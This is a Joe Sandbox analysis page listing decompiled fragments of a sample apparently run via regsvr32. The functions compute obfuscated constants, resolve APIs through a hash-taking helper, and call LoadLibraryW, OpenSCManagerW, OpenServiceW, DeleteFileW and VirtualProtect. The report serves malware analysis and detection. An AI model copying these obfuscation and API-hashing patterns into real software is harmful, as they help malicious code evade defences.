Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Free$Heap$Virtual$Destroy
String ID:
API String ID: 782257640-0
Opcode ID: 8d09bae66a092101ec0d8536e3fd4930ca71a05d961a1cef213ae4be0d99ec9d
Instruction ID: 52ea1ed54f47cb81a6273aebdf26490cad8d7f981141f8298da11aa75090f957
Opcode Fuzzy Hash: 8d09bae66a092101ec0d8536e3fd4930ca71a05d961a1cef213ae4be0d99ec9d
Instruction Fuzzy Hash: 81F04F35544A28BFF622AF11CCC5F127BA9FB80758F224064F7452A0B6CB72A854DB58

Uniqueness

Uniqueness Score: -1.00%

Function 04F7F6A1 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E04F7F6A1(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t31;
				struct HINSTANCE__* _t37;
				WCHAR* _t40;

				_push(_a12);
				_t40 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t31);
				_v28 = 0xc52aa;
				_v24 = 0x95615;
				_v20 = 0x738ab;
				_v16 = 0x613b6f;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x0c263f45;
				_v8 = 0x987e64;
				_v8 = _v8 + 0xffff93dc;
				_v8 = _v8 >> 5;
				_v8 = _v8 + 0x46a8;
				_v8 = _v8 ^ 0x00098c86;
				_v12 = 0x302d8a;
				_v12 = _v12 << 0xe;
				_v12 = _v12 | 0xe7847ef7;
				_v12 = _v12 ^ 0xefed21e1;
				E04F652F2(__ecx, __edx, __ecx, 0xa2, 0xef13742b, 0x9f49d153);
				_t37 = LoadLibraryW(_t40); // executed
				return _t37;
			}

0x04f7f6a8
0x04f7f6ab
0x04f7f6ad
0x04f7f6b0
0x04f7f6b3
0x04f7f6b4
0x04f7f6b5
0x04f7f6ba
0x04f7f6c4
0x04f7f6cb
0x04f7f6d2
0x04f7f6d9
0x04f7f6dd
0x04f7f6e4
0x04f7f6eb
0x04f7f6f2
0x04f7f6f6
0x04f7f6fd
0x04f7f704
0x04f7f70b
0x04f7f70f
0x04f7f716
0x04f7f736
0x04f7f73f
0x04f7f745

APIs

LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000), ref: 04F7F73F

Strings

CJD, xrefs: 04F7F6A1
o;a, xrefs: 04F7F6D2
!, xrefs: 04F7F716

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: o;a$!$CJD
API String ID: 1029625771-3784180784
Opcode ID: c45b9c2f0ee65167d17a9d1f18105e346d1cc9d46464ba724809973fdadbd5d7
Instruction ID: ef0028026cdde00f8b476fa974dbf6f7d2703133419188c6aad9bebef7be65f2
Opcode Fuzzy Hash: c45b9c2f0ee65167d17a9d1f18105e346d1cc9d46464ba724809973fdadbd5d7
Instruction Fuzzy Hash: 831112B6C01308BBCB01EFA4CC0988EBBB4EB10318F508088E91566251E3B99B54DF91

Uniqueness

Uniqueness Score: -1.00%

Function 10026F03 Relevance: 4.6, APIs: 3, Instructions: 60
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E10026F03(intOrPtr __ecx, void* __eflags) {
				void* _t37;
				intOrPtr _t54;
				void* _t56;

				E10011A8C(E1002A72B, _t56);
				_push(__ecx);
				_t54 = __ecx;
				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
				E100272F4(__ecx, __eflags); // executed
				 *((intOrPtr*)(_t56 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x1002bcdc;
				if( *((intOrPtr*)(_t56 + 8)) == 0) {
					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				} else {
					 *((intOrPtr*)(_t54 + 0x4c)) = E100123CD( *((intOrPtr*)(_t56 + 8)));
				}
				_t37 = E10027747();
				_t44 = _t37;
				_push(E10026E7B);
				_t7 = _t44 + 0x1070; // 0x1070
				 *((intOrPtr*)(E100285E7(_t7) + 4)) = _t54;
				 *((intOrPtr*)(_t54 + 0x28)) = GetCurrentThread();
				 *((intOrPtr*)(_t54 + 0x2c)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t37 + 4)) = _t54;
				 *((intOrPtr*)(_t54 + 0x40)) = 0;
				 *((intOrPtr*)(_t54 + 0x78)) = 0;
				 *((intOrPtr*)(_t54 + 0x60)) = 0;
				 *((intOrPtr*)(_t54 + 0x64)) = 0;
				 *((intOrPtr*)(_t54 + 0x50)) = 0;
				 *((intOrPtr*)(_t54 + 0x5c)) = 0;
				 *((intOrPtr*)(_t54 + 0x84)) = 0;
				 *((intOrPtr*)(_t54 + 0x54)) = 0;
				 *((short*)(_t54 + 0x8e)) = 0;
				 *((short*)(_t54 + 0x8c)) = 0;
				 *((intOrPtr*)(_t54 + 0x44)) = 0;
				 *((intOrPtr*)(_t54 + 0x88)) = 0;
				 *((intOrPtr*)(_t54 + 0x7c)) = 0;
				 *((intOrPtr*)(_t54 + 0x80)) = 0;
				 *((intOrPtr*)(_t54 + 0x6c)) = 0;
				 *((intOrPtr*)(_t54 + 0x70)) = 0;
				 *((intOrPtr*)(_t54 + 0x90)) = 0;
				 *((intOrPtr*)(_t54 + 0x98)) = 0;
				 *((intOrPtr*)(_t54 + 0x58)) = 0;
				 *((intOrPtr*)(_t54 + 0x68)) = 0;
				 *((intOrPtr*)(_t54 + 0x94)) = 0x200;
				 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
				return _t54;
			}

0x10026f08
0x10026f0d
0x10026f10
0x10026f13
0x10026f16
0x10026f20
0x10026f23
0x10026f29
0x10026f39
0x10026f2b
0x10026f34
0x10026f34
0x10026f3c
0x10026f41
0x10026f43
0x10026f48
0x10026f53
0x10026f5c
0x10026f68
0x10026f6b
0x10026f6e
0x10026f71
0x10026f74
0x10026f77
0x10026f7a
0x10026f7d
0x10026f80
0x10026f86
0x10026f89
0x10026f90
0x10026f97
0x10026f9a
0x10026fa0
0x10026fa3
0x10026fa9
0x10026fac
0x10026faf
0x10026fb5
0x10026fbb
0x10026fbe
0x10026fc2
0x10026fd0
0x10026fd8

APIs

__EH_prolog.LIBCMT ref: 10026F08

Part of subcall function 100272F4: __EH_prolog.LIBCMT ref: 100272F9

GetCurrentThread.KERNEL32 ref: 10026F56
GetCurrentThreadId.KERNEL32 ref: 10026F5F

Part of subcall function 100123CD: _strlen.LIBCMT ref: 100123D7
Part of subcall function 100123CD: _strcat.LIBCMT ref: 100123EB

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrentH_prologThread$_strcat_strlen
String ID:
API String ID: 268772951-0
Opcode ID: 276c48dd1b96b31a62c856c06b76c29d4c71fae2a12c294a13216174a5a39cd3
Instruction ID: 1ea434eef89218c202f70ed0f3fdbcf79c7dfff6394bd0b9137d158ef3fdfccf
Opcode Fuzzy Hash: 276c48dd1b96b31a62c856c06b76c29d4c71fae2a12c294a13216174a5a39cd3
Instruction Fuzzy Hash: B5217CB4801B50CFD720CF2AD94469AFBF8FFA4240B50891FE5AA86B21CBB4A541CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10002BC0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E10002BC0() {
				intOrPtr _t86;
				signed int _t88;
				signed int _t93;
				signed int _t94;
				signed int _t97;
				signed int _t123;
				signed int _t141;
				signed int _t147;
				signed int _t161;
				signed int _t168;
				signed int _t175;
				signed int _t194;
				signed int _t196;
				intOrPtr* _t199;
				signed int _t200;
				long _t201;
				signed int _t203;
				signed int _t204;
				signed int _t210;
				signed int _t224;
				signed int _t225;
				signed int _t229;
				signed int _t251;
				signed int _t260;
				void* _t279;

				_t201 =  *(_t279 + 0x18);
				_t86 =  *((intOrPtr*)(_t201 + 8));
				 *((intOrPtr*)(_t279 + 8)) = _t86;
				if(_t86 != 0) {
					_t210 =  *0x1003610c; // 0x0
					_t175 =  *0x10036110; // 0x0
					_t229 =  *0x10036120; // 0x0
					 *((intOrPtr*)(_t279 + 0xc)) =  *((intOrPtr*)(_t201 + 0xc));
					_t203 =  *0x1003611c; // 0x0
					_t224 =  *0x10036118; // 0x0
					_t6 = _t210 - 1; // -1
					_t88 = _t6 * _t229;
					_t225 =  *0x10036114; // 0x0
					 *(_t279 + 0x1c) = _t88;
					_t9 = (_t224 * 0x7fffffff + _t203) * 2; // 0x1ffffff
					if(( *(_t279 + 0x10) & (_t88 + 0xfffffffc) * _t229 + (_t203 * _t224 - _t175 - 0x00000001) * _t175 + _t225 + _t9 + 0x02000000) == 0) {
						_t93 = _t210 * _t210;
						 *(_t279 + 0x14) = _t93;
						_t94 =  *0x10036118; // 0x0
						_t97 =  *0x10036118; // 0x0
						_t48 = (_t97 * 0x3fffffff + _t203) * 2; // 0x10000000
						asm("sbb ebx, ebx");
						_t51 = _t229 + 0x7fffffff; // 0x7fffffff
						asm("sbb ebp, ebp");
						asm("sbb eax, eax");
						_t194 =  *0x10036118; // 0x0
						 *(_t279 + 0x14) =  *(0x10036128 + ( ~( ~((( *(_t279 + 0x14) * _t229 + _t203) * _t225 -  *0x10036110) * _t203 +  *(_t279 + 0x1c) - 0x80000000 &  *(_t279 + 0x10))) + ( ~( ~(_t51 * _t229 + _t51 * _t229 + 0x40000000 &  *(_t279 + 0x10))) +  ~( ~((_t93 * _t94 * 0x7fffffff + _t225 * _t229) * _t225 + (_t94 + 0x7fffffff + (_t203 * 0x3fffffff + _t210) * 0x00000002) *  *0x10036110 + _t48 + 0x10000000 + _t229 * 0x7fffffff << 0x00000001 &  *(_t279 + 0x10))) * 2) * 2) * 4);
						_t251 =  *0x10036110; // 0x0
						_t67 = (1 - (_t203 * _t203 * _t229 * _t194 + _t251) * _t225 - _t229) * _t203 + _t225 + 0x4000000; // 0x4000001
						if(( *(_t279 + 0x10) & (0x00000001 - (_t203 * _t203 * _t229 * _t194 + _t251) * _t225 - _t229) * _t203 + _t225 + _t67) != 0) {
							 *(_t279 + 0x14) =  *(_t279 + 0x14) | 0x00000200 - _t203 - _t194;
						}
						_t123 =  *0x10036110; // 0x0
						_t74 = _t194 + 2; // 0x2
						_t260 =  *0x10036110; // 0x0
						_t204 =  *0x10036110; // 0x0
						_t82 = _t225 + 1; // 0x1
						_t141 = VirtualProtect( *( *(_t279 + 0x30)), ((_t260 * _t194 << 1) - (_t225 + _t203 << 1) + 2) * _t203 +  *((intOrPtr*)(_t279 + 0x20)) + ((_t204 + _t194) * 0x7fffffff + (_t210 * _t229 + _t82 * 0x7fffffff) * _t229 + _t225) * 2,  *(_t279 + 0x18), _t279 + 0x28 + ((_t123 - _t210 - _t229 + 1) * _t229 - (_t225 + _t74) * _t225 - _t194 + _t260 + ((_t123 - _t210 - _t229 + 1) * _t229 - (_t225 + _t74) * _t225 - _t194 + _t260) * 2) * 4); // executed
						asm("sbb eax, eax");
						return  ~( ~_t141);
					} else {
						_t147 =  *(_t279 + 0x28);
						_t196 =  *_t147;
						 *(_t279 + 0x14) = _t196;
						if(_t196 ==  *((intOrPtr*)(_t147 + 4))) {
							_t199 =  *((intOrPtr*)(_t279 + 0x24));
							if( *((intOrPtr*)(_t147 + 0x10)) != 0) {
								L8:
								_t39 = ((_t225 - _t203 + _t229) *  *0x10036110 - _t203 -  *0x10036118 + _t225 + _t210 + _t229) * 2; // -268640536
								 *((intOrPtr*)(_t199 + 0x20))( *(_t279 + 0x18),  *(_t279 + 0x1c), (_t225 - _t203 + _t229) *  *0x10036110 - _t203 -  *0x10036118 + _t225 + _t210 + _t229 + _t39 + 0x4000,  *((intOrPtr*)(_t199 + 0x34)));
							} else {
								_t161 =  *(_t199 + 0x3c);
								 *(_t279 + 0x28) = _t161;
								if( *((intOrPtr*)( *_t199 + 0x38)) == _t161) {
									goto L8;
								} else {
									_t200 =  *0x10036110; // 0x0
									_t23 = _t225 + 0x3fffffff; // 0x3fffffff
									_t168 =  *0x10036118; // 0x0
									if( *(_t279 + 0x18) %  *(_t279 + 0x28) + (((_t203 * _t203 * _t200 * 0x3fffffff + _t225 * _t225 * _t229) * _t203 + _t23) * _t229 - (_t210 * _t168 + _t200 + 1) * _t168 + _t203 * 0x3fffffff) * 4 == 0) {
										_t199 =  *((intOrPtr*)(_t279 + 0x24));
										_t210 =  *0x1003610c; // 0x0
										goto L8;
									}
								}
							}
						}
						return 1;
					}
				} else {
					return 1;
				}
			}

0x10002bc3
0x10002bc7
0x10002bcc
0x10002bd0
0x10002bde
0x10002be5
0x10002bed
0x10002bf3
0x10002bf7
0x10002bfe
0x10002c0b
0x10002c0e
0x10002c17
0x10002c23
0x10002c31
0x10002c40
0x10002d19
0x10002d1c
0x10002d22
0x10002d54
0x10002d61
0x10002d7e
0x10002d80
0x10002d9a
0x10002dc4
0x10002dd2
0x10002dd8
0x10002de1
0x10002e00
0x10002e0d
0x10002e1e
0x10002e1e
0x10002e22
0x10002e32
0x10002e3b
0x10002e69
0x10002e71
0x10002e97
0x10002ea1
0x10002eaa
0x10002c46
0x10002c46
0x10002c4a
0x10002c4f
0x10002c53
0x10002c5e
0x10002c62
0x10002cd3
0x10002cf6
0x10002d04
0x10002c64
0x10002c64
0x10002c69
0x10002c70
0x00000000
0x10002c72
0x10002c72
0x10002c93
0x10002c9a
0x10002cc7
0x10002cc9
0x10002ccd
0x00000000
0x10002ccd
0x10002cc7
0x10002c70
0x10002c62
0x10002d16
0x10002d16
0x10002bd2
0x10002bda
0x10002bda

Strings

`gv, xrefs: 10002E97

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID: `gv
API String ID: 0-976742683
Opcode ID: ddb8229b36c1e569842992b1100f392691254f9f8c1865d37d5cf40887b2d16a
Instruction ID: 35123656d4fabb3a1d51c6032c7c7db7984ad3ba38261295779c8e01731928ad
Opcode Fuzzy Hash: ddb8229b36c1e569842992b1100f392691254f9f8c1865d37d5cf40887b2d16a
Instruction Fuzzy Hash: 2291547174431A8FD308DF6CDDC2A45B7D9FB99710F08963AD524CF2E6F660E6158A80

Uniqueness

Uniqueness Score: -1.00%

Function 04F744FD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61
serviceCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E04F744FD(void* __ecx, void* __edx, short* _a4, int _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t50;
				void* _t62;
				signed int _t64;
				signed int _t65;
				signed int _t66;
				void* _t74;

				_push(_a12);
				_t74 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E04F732C4(_t50);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v32 = 0x792d8;
				_v28 = 0x84714;
				_v16 = 0x50e075;
				_t64 = 0x53;
				_v16 = _v16 / _t64;
				_t65 = 0x6c;
				_v16 = _v16 / _t65;
				_v16 = _v16 ^ 0x000f88cd;
				_v12 = 0xc0b1e0;
				_v12 = _v12 + 0xba8c;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x0004e584;
				_v8 = 0x1443c3;
				_v8 = _v8 + 0xffff44ff;
				_v8 = _v8 + 0xffffe351;
				_t66 = 0x7e;
				_v8 = _v8 / _t66;
				_v8 = _v8 ^ 0x0003da15;
				E04F652F2(_t66, _v8 % _t66, _t66, 0x1d7, 0x5d43c945, 0x2217af3d);
				_t62 = OpenServiceW(_t74, _a4, _a8); // executed
				return _t62;
			}

0x04f74504
0x04f74507
0x04f74509
0x04f7450c
0x04f7450f
0x04f74511
0x04f74516
0x04f7451d
0x04f74523
0x04f7452a
0x04f74531
0x04f7453d
0x04f74542
0x04f7454a
0x04f7454f
0x04f74554
0x04f7455b
0x04f74562
0x04f74569
0x04f7456d
0x04f74574
0x04f7457b
0x04f74582
0x04f7458c
0x04f74594
0x04f74597
0x04f745b2
0x04f745c1
0x04f745c7

APIs

OpenServiceW.ADVAPI32(?,0004E584,000F88CD,?,?,?,?,?,?,?,?,00000059), ref: 04F745C1

Strings

uP, xrefs: 04F74531

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: uP
API String ID: 3098006287-2366566880
Opcode ID: 9585c2ce8f40bd2cc0f3201e6871bdc084c5e74b7958e260008a04744ae413a8
Instruction ID: 686695216f676be79ef83578108b3b2cbbc13fe0066e53271659a44c58cdf8e7
Opcode Fuzzy Hash: 9585c2ce8f40bd2cc0f3201e6871bdc084c5e74b7958e260008a04744ae413a8
Instruction Fuzzy Hash: A62127B6E01208FBDB04DF95C8499DEBBB1EF44314F10C089E91466294E7B55B149F50

Uniqueness

Uniqueness Score: -1.00%

Function 04F7EEEF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E04F7EEEF(void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t42;
				intOrPtr* _t49;
				void* _t50;
				signed int _t51;

				E04F732C4(_t42);
				_v32 = 0xc2d68;
				_v28 = 0xfb918;
				_v24 = 0;
				_v20 = 0;
				_v12 = 0x3d6fce;
				_v12 = _v12 | 0xd21bdb86;
				_v12 = _v12 >> 8;
				_v12 = _v12 | 0xdbd18b9f;
				_v12 = _v12 ^ 0xdbd755e2;
				_v8 = 0x416d85;
				_v8 = _v8 ^ 0x6a656ffb;
				_v8 = _v8 + 0xffff80ac;
				_t51 = 0x15;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x050b4d40;
				_v16 = 0x2b8e30;
				_v16 = _v16 + 0xffff19b1;
				_v16 = _v16 ^ 0x002a566f;
				_t49 = E04F652F2(_t51, _v8 % _t51, _t51, 0x1ab, 0x4055a1c4, 0x9f49d153);
				_t50 =  *_t49(_a24, 0, _a12, 0x28, 0x28, __edx, 0, _a8, _a12, _a16, _a20, _a24); // executed
				return _t50;
			}

0x04f7ef0b
0x04f7ef10
0x04f7ef1a
0x04f7ef23
0x04f7ef26
0x04f7ef29
0x04f7ef30
0x04f7ef37
0x04f7ef3b
0x04f7ef42
0x04f7ef49
0x04f7ef50
0x04f7ef57
0x04f7ef63
0x04f7ef6b
0x04f7ef6e
0x04f7ef75
0x04f7ef7c
0x04f7ef83
0x04f7ef9e
0x04f7efaf
0x04f7efb5

APIs

SetFileInformationByHandle.KERNELBASE(000C2D68,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,?,0001EB97), ref: 04F7EFAF

Strings

oV*, xrefs: 04F7EF83

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID: oV*
API String ID: 3935143524-2341496331
Opcode ID: 7214423854755b1e25ddac868edf16d6ddfade4bb11ed980600bdde7ca93737e
Instruction ID: 5403131b699c5d7efb66ee3705ef40768578dae16936ad5eb58ff93b0ecb9f6f
Opcode Fuzzy Hash: 7214423854755b1e25ddac868edf16d6ddfade4bb11ed980600bdde7ca93737e
Instruction Fuzzy Hash: B02122B2D01219BBDF15DFD4DC4A8DEBFB5EF08714F108089A914A6254D3B54B64EB80

Uniqueness

Uniqueness Score: -1.00%

Function 04F77E14 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E04F77E14(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, int _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short* _v20;
				short* _v24;
				intOrPtr _v28;
				void* _t33;
				void* _t40;

				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E04F732C4(_t33);
				_v28 = 0x38698;
				_v24 = 0;
				_v20 = 0;
				_v12 = 0xf80068;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0x9c2a;
				_v12 = _v12 ^ 0xf804c3a3;
				_v8 = 0xd3ebc3;
				_v8 = _v8 << 0x10;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x000f62ee;
				_v16 = 0x690a65;
				_v16 = _v16 | 0xebc01c25;
				_v16 = _v16 ^ 0xebe7ec5f;
				E04F652F2(__ecx, __edx, __ecx, 0x184, 0x21b856d, 0x2217af3d);
				_t40 = OpenSCManagerW(0, 0, _a20); // executed
				return _t40;
			}

0x04f77e1b
0x04f77e20
0x04f77e23
0x04f77e24
0x04f77e27
0x04f77e2a
0x04f77e2b
0x04f77e2c
0x04f77e31
0x04f77e3b
0x04f77e3e
0x04f77e41
0x04f77e48
0x04f77e4c
0x04f77e53
0x04f77e5a
0x04f77e61
0x04f77e65
0x04f77e7d
0x04f77e80
0x04f77e87
0x04f77e8e
0x04f77e95
0x04f77ea5
0x04f77eb2
0x04f77eb8

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00038698,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04F77EB2

Strings

_, xrefs: 04F77E95

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: _
API String ID: 1889721586-4005583852
Opcode ID: 0ec8570205f070ed90a2b8cce3a636dd87b03550e57a7aa89694fbd21c5d6a25
Instruction ID: 32f5513ed2d7f44b65defa64b11bc0df35198fa84cb49fe5c339b23b2beaf866
Opcode Fuzzy Hash: 0ec8570205f070ed90a2b8cce3a636dd87b03550e57a7aa89694fbd21c5d6a25
Instruction Fuzzy Hash: 7E1103B1C01218BBDF01DF99DD4A8CEBFB9EF04354F508489E915A6251D3B68B24EB91

Uniqueness

Uniqueness Score: -1.00%

Function 04F62CC4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E04F62CC4(void* __ecx, void* __edx, long _a4, intOrPtr _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t35;
				void* _t42;
				void* _t45;

				_push(_a16);
				_t45 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t35);
				_v20 = 0xfe94d;
				_v16 = 0xab1c4;
				_v16 = 0x50de48;
				_v16 = _v16 * 0x6c;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0xc664fcf6;
				_v8 = 0xfaad6e;
				_v8 = _v8 << 0xf;
				_v8 = _v8 + 0xffffd3fa;
				_v8 = _v8 ^ 0xf4e1ffa5;
				_v8 = _v8 ^ 0xa25eb8a6;
				_v12 = 0xe37a21;
				_v12 = _v12 << 0xa;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0xd10447cc;
				E04F652F2(__ecx, __edx, __ecx, 0x11b, 0x94519920, 0x9f49d153);
				_t42 = RtlAllocateHeap(_t45, _a4, _a12); // executed
				return _t42;
			}

0x04f62ccb
0x04f62cce
0x04f62cd0
0x04f62cd3
0x04f62cd6
0x04f62cd9
0x04f62cda
0x04f62cdb
0x04f62ce0
0x04f62cea
0x04f62cf1
0x04f62d0c
0x04f62d0f
0x04f62d13
0x04f62d1a
0x04f62d21
0x04f62d25
0x04f62d2c
0x04f62d33
0x04f62d3a
0x04f62d41
0x04f62d45
0x04f62d49
0x04f62d59
0x04f62d68
0x04f62d6e

APIs

RtlAllocateHeap.NTDLL(?,D10447CC,000FE94D), ref: 04F62D68

Strings

!z, xrefs: 04F62D3A

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: !z
API String ID: 1279760036-1244814218
Opcode ID: 63d04e0be5aee74c004eb1a3a006b3cda8d139836361cfad7403e2016b774436
Instruction ID: 7a3f60b0337053db92bf33de518f6883a180819d91913ea751d86b0274758645
Opcode Fuzzy Hash: 63d04e0be5aee74c004eb1a3a006b3cda8d139836361cfad7403e2016b774436
Instruction Fuzzy Hash: 5211DFB2C04208BBDB01EFE4D94A8DEBFB5EF45304F108488E92566251D3759B20EF90

Uniqueness

Uniqueness Score: -1.00%

Function 04F758BD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E04F758BD(WCHAR* __ecx, void* __edx, intOrPtr _a4) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t27;
				int _t35;
				WCHAR* _t38;

				_push(_a4);
				_t38 = __ecx;
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t27);
				_v16 = 0x13586;
				_v16 = 0x4c59cc;
				_v16 = _v16 ^ 0xe50d706a;
				_v16 = _v16 ^ 0xe54f7d54;
				_v12 = 0x3bf9e4;
				_v12 = _v12 + 0x106;
				_v12 = _v12 * 0x7a;
				_v12 = _v12 ^ 0x1c92743a;
				_v8 = 0x406212;
				_v8 = _v8 * 0x60;
				_v8 = _v8 + 0xffffd8c7;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x000758b5;
				E04F652F2(__ecx, __edx, __ecx, 0x1f5, 0x7518e659, 0x9f49d153);
				_t35 = DeleteFileW(_t38); // executed
				return _t35;
			}

0x04f758c4
0x04f758c7
0x04f758c9
0x04f758ca
0x04f758cb
0x04f758d0
0x04f758da
0x04f758e1
0x04f758e8
0x04f758ef
0x04f758f6
0x04f75911
0x04f75914
0x04f7591b
0x04f75926
0x04f75929
0x04f75930
0x04f75934
0x04f75944
0x04f7594d
0x04f75953

APIs

DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00000000), ref: 04F7594D

Strings

T}O, xrefs: 04F758E8

Memory Dump Source

